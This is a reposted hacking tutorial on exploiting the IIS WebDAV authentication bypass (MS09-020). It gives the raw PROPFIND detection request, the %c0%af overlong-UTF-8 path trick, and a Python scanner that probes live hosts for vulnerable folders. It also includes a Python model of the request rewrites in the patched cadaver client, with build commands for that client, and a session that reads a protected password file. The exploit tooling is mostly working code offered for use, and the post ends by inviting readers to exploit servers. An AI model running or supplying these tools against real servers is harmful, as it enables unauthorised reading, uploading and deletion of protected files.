Mar 26, 2011

___WebDAV on IIS___


WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to HTTP that lets users collaboratively edit and manage documents and files stored on web servers. It adds methods such as PROPFIND, PROPPATCH, MKCOL, COPY and MOVE on top of the usual GET and PUT (RFC 4918).

Detection, Vulnerability Checking and Exploitation

The first thing to know about this vulnerability (the IIS WebDAV authentication bypass that Microsoft fixed in MS09-020) is that an IIS server is not exploitable if the web root itself is password protected: the bypass only gets you into protected subfolders under a root you can already reach. If the root is protected there is also no way to tell from outside whether WebDAV is even enabled, because every PROPFIND just comes back with a 401. If the root is not protected, it's time to go to work on the server.

Detecting if WebDAV is enabled

Tested on:

►IIS 6.0/Windows 2003 Enterprise SP2
►IIS 5.1/Windows XP Pro SP2
►IIS 5.0/Windows 2000 SP4

Note: on IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1 it is enabled by default, and you have to edit the registry to disable it (the DisableWebDAV value described in Microsoft KB 241520).

Detection simply involves sending a PROPFIND request to the server. This is the same basic PROPFIND request used in the http-iis-webdav-vuln.nse script:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop>
</propfind>

If WebDAV is enabled, the server answers with a 207 status line, something like "HTTP/1.1 207 Multi-Status", followed by an XML body describing the resource.

If WebDAV has been disabled, it answers with a 501 (the original shows "HTTP/1.1 501 Not Supported"). Key off the status code, not the reason phrase, since the phrase varies between versions. A 401 on the root means the root is protected and the test tells you nothing either way.

Checking if a server is vulnerable

Tested on (working):

► IIS 6.0/Windows 2003 Enterprise SP2
► IIS 5.1/Windows XP Pro SP2

Tested on (not working):

►IIS 5.0/Windows 2000 SP4

The original script used only one type of check: it would first find a protected folder (/secret/, i.e. one that answers PROPFIND with 401) and then try inserting the %c0%af sequence right after the leading slash, turning /secret/ into /%c0%afsecret/. %c0%af is an invalid, overlong UTF-8 encoding of "/"; IIS evaluates the access check on the path with the sequence still in it (so it no longer matches the protected folder), but discards it when mapping the path to the file system, so the real /secret/ gets served.

This works fine on IIS 6.0 but does not work at all on IIS 5.0/5.1. The trick with 5.1 is that the %c0%af sequence cannot sit right after the slash; it has to be somewhere in the middle of the folder name. That placement also works on IIS 6.0, so I modified the script to use the 5.1/6.0 check, inserting the sequence after the first character of the folder name and turning /secret/ into /s%c0%afecret/.
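The two steps above, detection with PROPFIND and the %c0%af folder check, written out in Python as an added example (this is not the nse script and not code from the original post). It assumes, as the script's logic does, that a protected folder answers PROPFIND with 401 and that the bypass has worked when the mangled path answers 207; host names and folder lists are placeholders you supply on the command line.

```python
"""Added example: IIS WebDAV detection plus the %c0%af bypass check.

Assumptions (not stated on the page): plain HTTP on port 80, a protected
folder answers PROPFIND with 401, and a bypass counts as successful when
the same folder answers 207 through the mangled path.
"""
import re
import socket

# Same property request the page shows; Content-Length is computed below.
PROPFIND_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<propfind xmlns="DAV:">\n'
    '<prop>\n'
    '<getcontentlength xmlns="DAV:"/>\n'
    '<getlastmodified xmlns="DAV:"/>\n'
    '<executable xmlns="http://apache.org/dav/props/"/>\n'
    '<resourcetype xmlns="DAV:"/>\n'
    '<checked-in xmlns="DAV:"/>\n'
    '<checked-out xmlns="DAV:"/>\n'
    '</prop>\n'
    '</propfind>\n'
)

STATUS_RE = re.compile(r"HTTP/1\.[01] (\d{3})")


def build_propfind(host, path="/"):
    """Raw PROPFIND request with a Content-Length derived from the body."""
    body = PROPFIND_BODY.encode()
    head = (
        f"PROPFIND {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode() + body


def classify(status_line):
    """What the status line of a PROPFIND on / tells us about WebDAV."""
    m = STATUS_RE.match(status_line)
    if not m:
        return "no-http"
    code = int(m.group(1))
    if code == 207:
        return "webdav-enabled"
    if code == 501:
        return "webdav-disabled"
    if code in (401, 403):
        return "root-protected"      # cannot tell whether WebDAV is on
    return f"other-{code}"


def bypass_paths(folder):
    """(original-script variant, 5.1/6.0 variant) for a folder name.

    /secret/ -> /%c0%afsecret/ (IIS 6.0 only) and /s%c0%afecret/ (5.1 and 6.0).
    """
    folder = folder.strip("/")
    after_slash = "/%c0%af" + folder + "/"
    mid_name = "/" + folder[0] + "%c0%af" + folder[1:] + "/"
    return after_slash, mid_name


def verdict(baseline_code, bypass_code):
    """Only a folder that is protected (401) and then opens up (207) counts."""
    if baseline_code != 401:
        return "not-protected"
    return "vulnerable" if bypass_code == 207 else "protected"


def probe(host, path="/", port=80, timeout=5):
    """Live check: send the PROPFIND and return the numeric status code."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_propfind(host, path))
        data = b""
        while b"\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    m = STATUS_RE.match(data.split(b"\r\n", 1)[0].decode("latin-1"))
    return int(m.group(1)) if m else None


def check_folder(host, folder, port=80):
    """Baseline PROPFIND on /folder/, then the 5.1/6.0 mangled path."""
    base = probe(host, "/" + folder.strip("/") + "/", port)
    _, mangled = bypass_paths(folder)
    return verdict(base, probe(host, mangled, port))


if __name__ == "__main__":
    import sys
    target, folders = sys.argv[1], sys.argv[2:] or ["secret"]
    code = probe(target)
    print(f"PROPFIND / -> {code}: {classify(f'HTTP/1.1 {code} -')}")
    for name in folders:
        print(f"/{name}/ -> {check_folder(target, name)}")
```

Run it as `python3 webdav_check.py <host> secret private webdav`; a folder reported as "not-protected" is simply not interesting for this bug, since there is nothing to bypass.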

Finding a vulnerable server

First we need to find a vulnerable server. Here is an nmap scan of a box with the updated script:

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
WebDAV is enabled and three folders are vulnerable: /private, /secret and /webdav.


Exploiting it!

You could just telnet to the host on port 80 and type the requests by hand, but for more fun we will use the WebDAV client cadaver.

The nice thing about cadaver is that it is open source. Take the cadaver-0.23.2 source; after some hacking on it, a small patch makes exploiting a server quite easy. Check the patch itself for the gritty details, but basically it does the following:

1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work)
2) Append the header "Translate: f" to every request (otherwise get and probably others won't work)
3) Insert the characters "%c0%af" into any request URI longer than one character
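What the three rules do to a request, modelled in Python as an added example (this is not the cadaver patch, which changes neon's C source; it only reproduces the header and URI rewrites listed above). Where in the URI the patch puts %c0%af is not stated on the page; the model assumes the position the 5.1/6.0 check uses, after the first character of the first path segment.

```python
"""Added example: the three rewrites the cadaver-0.23.2-h4x patch applies,
modelled on a raw HTTP request string (assumption: %c0%af goes after the
first character of the path, as in the 5.1/6.0 folder check)."""

MAGIC = "%c0%af"   # overlong UTF-8 encoding of "/"


def mangle_uri(uri):
    """Rule 3: insert %c0%af into any request URI longer than one character.

    "/" stays as it is; "/secret/password.txt" -> "/s%c0%afecret/password.txt".
    """
    if len(uri) <= 1 or not uri.startswith("/") or MAGIC in uri:
        return uri
    return "/" + uri[1] + MAGIC + uri[2:]


def h4x_request(raw):
    """Apply rules 1-3 to one raw request ("\\r\\n"-separated header block)."""
    head, sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, version = lines[0].split(" ", 2)
    request_line = f"{method} {mangle_uri(uri)} {version}"
    headers = []
    has_translate = False
    for h in lines[1:]:
        name, _, value = h.partition(":")
        if name.strip().lower() == "depth" and value.strip() == "0":
            h = "Depth: 1"                 # rule 1: listings need Depth: 1
        if name.strip().lower() == "translate":
            has_translate = True
        headers.append(h)
    if not has_translate:
        headers.append("Translate: f")     # rule 2: ask IIS for the raw file
    return "\r\n".join([request_line] + headers) + sep + body


if __name__ == "__main__":
    sample = "PROPFIND /secret/ HTTP/1.1\r\nHost: target\r\nDepth: 0\r\n\r\n"
    print(h4x_request(sample))
```

Translate: f is the header WebDAV and FrontPage clients use to tell IIS to hand back the file as it is on disk instead of running it through its script mapping, which is why plain GET under the protected folder needs it once the path has been mangled.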

Get cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here are the commands:
> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
--snip--
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
--snip--
> tar xzvf cadaver-0.23.2.tar.gz
--snip--
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
--snip--
> make
--snip--

Now we should have a patched, compiled cadaver, so start it up against the server that was identified as having a vulnerable folder earlier:


> ./cadaver xxx.xxx.xxx.xxx

This should drop you at a "dav:/>" prompt. Now just cd into the vulnerable folder and check out what's there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>

That's it :D
Here is a list of the cadaver commands that work with the patched client against a vulnerable folder:

* cd
* ls
* move
* put
* get
* cat
* delete



If you exploited an IIS server, let me know ;)

I am not the writer of this tutorial; it was only edited by me.

Happy Hacking

